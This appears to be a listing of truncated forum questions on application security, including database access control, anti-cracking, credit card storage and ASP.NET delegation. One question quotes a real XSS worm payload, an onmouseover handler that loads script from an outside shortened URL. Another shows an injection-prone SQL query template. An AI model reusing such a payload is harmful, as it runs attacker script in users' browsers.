Hi folks, I'm developing on an application at the moment which contains quite a lot of personal user information - things like Facebook contacts, etc ... Now, one of the things I want to be able to do (and have done, quite effectively) is open up parts of the application to "3rd Party" applications, using Android's build-in inter-proces...
What are your experiences/thoughts ? Are there currently any approaches that prevent automated cracks ? I know that any app is crackable if someone is persistent. However, i would like to make it as hard as possible for the crackers. What methods are currently used for integrity checking and crack prevention ? ...
I am thinking of using cakePHP to build a web app. My question is how much of security stuff will I have to code myself to prevent (SQL injection etc)? What security stuff cakePHP takes care of by itself and what will I have to code? ...
I want to limit access to username+password table to one query pattern like: SELECT count(id) AS auth_result FROM user WHERE username = '%s' AND password = SHA1('%s') (this query doesn't pretend to be working from the point of injection vulnerability, just an example) Is that possible? or am I missing some different approach? ...
Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ Is this technically an XSS attack or something else? Here is how the Twitter home page l...
I have just added the code to my index.html and uploaded the file. But Google Analytics Status says the code is not installed (not found). I have a VPS (own server) which I manage myself. Thing is, in my case, I have a setup like this: IP adress at a VPS provider Domain name at an ISP A-Pointer to point my domain to my IP adress...
[1] tells well known (see, for. ex, also [2], etc) fact that upon installation, i.e. in workgroup, a Windows has LocalSystem (SYSTEM) account which: "The LocalSystem account is a predefined local account that has extensive privileges on the local computer. This account is only available to system processes and does not have a pass...
Reposting my unanswered in technet.microsoft question? MSDN "ASP.NET Delegation" article tells: 1) "When you configure to use a particular account as the process identity, ASP.NET attempts to delegate that account. If it is a local account that is identical (including password) to a local account on a remote machine, delegation i...
[1] tells: "When you configure to use a particular account as the process identity, ASP.NET attempts to delegate that account. If it is a local account that is identical (including password) to a local account on a remote machine, delegation is possible. If such an account does not exist on the remote machine, to the network it appe...
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN. I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA...web service providers and consumers. In other words, is there any concern that something on the LAN could be sniffing plaintext ...
I have a jQuery function that runs through the page, finds links to a certain domain, does an ajax call to get some data and crafts a tooltip when the visitor hovers their mouse over the link. Just like wowhead.com/tooltips. What are some things to consider when allowing other sites to include your script files, linked directly from you...
Hello, We have a WMQ - WAS/JMS client setup through server connection channels where we are trying to put in security through user Ids. Now, we set up a local user id on the MQ box, mquserid, and left the channel's MCAUSER blank. We thought: the id running the MQ client (WAS in our case) wasuserid, when passed to MQ will fail as it is...
Hi On 2nd edition of "Programming WCF Services" By Lowy, ch 10, page 512. Lowy said about Transport security: Its main downside is that it can only guarantee transfer security point-point, meaning when the client connects directly to the service. Having multiple intermediaries between the client and the service renders Transport securi...
Is there a published set of IE enhanced security blocking rules? Background: When I try out certain jQuery scripts, I sometimes trigger the IE enhanced security warning - then its a matter of trial and error removing bits of the code until I find the offending part,and see if the jQuery can work without it. commenting out the code doe...
I am struggling with this problem since last one week. I have obfuscated exe of my application. Our application is offline tool for online web application. Client will install this application and connect once to internet, application will download relevant information and store in xml file on client machine for further display. for secu...
I am working in PHP on a Linux server with MySQL. I have a requirement (that I have attempted to talk them out of) to collect credit card information from users so that our company can use the card numbers to hold hotel rooms for a conference. We will not be charging the cards ourselves at all, but instead just sending them to the ho...
Is it possible to understand whether a certificate in Windows cert store imported as "Enable Strong Private Key" protection in .NET? ...
I am still unable to figure out the following which are related to Oracle padding security issue. The no. 1 point is in general which I wanted to know the easy way to change the Machine key. The no. 2 point is related to Security issue. If I change the machine key then how easily I can change the user passwords stored in the DB. User p...
I am looking for a way to restrict direct access to a certain folder or folders on our website which is hosted in IIS7 in our second dev environment, IIS6 in our first dev environment and IIS6 on production. Basically we should be able to link to these files from our website i.e.: http://www.domain.com/stuff/survey.pdf But if someone t...
Hi all, Environment: 11g db server The "SQLNET.ENCRYPTION_SERVER" value is not taking from the configuration file it is taking the default value "ACCEPTED" instaead of "REQUIRED". After the changes done through net manager I have restarted the listener. Please advise where I need to make the changes. Trace file: 2010-09-22 19:11:13...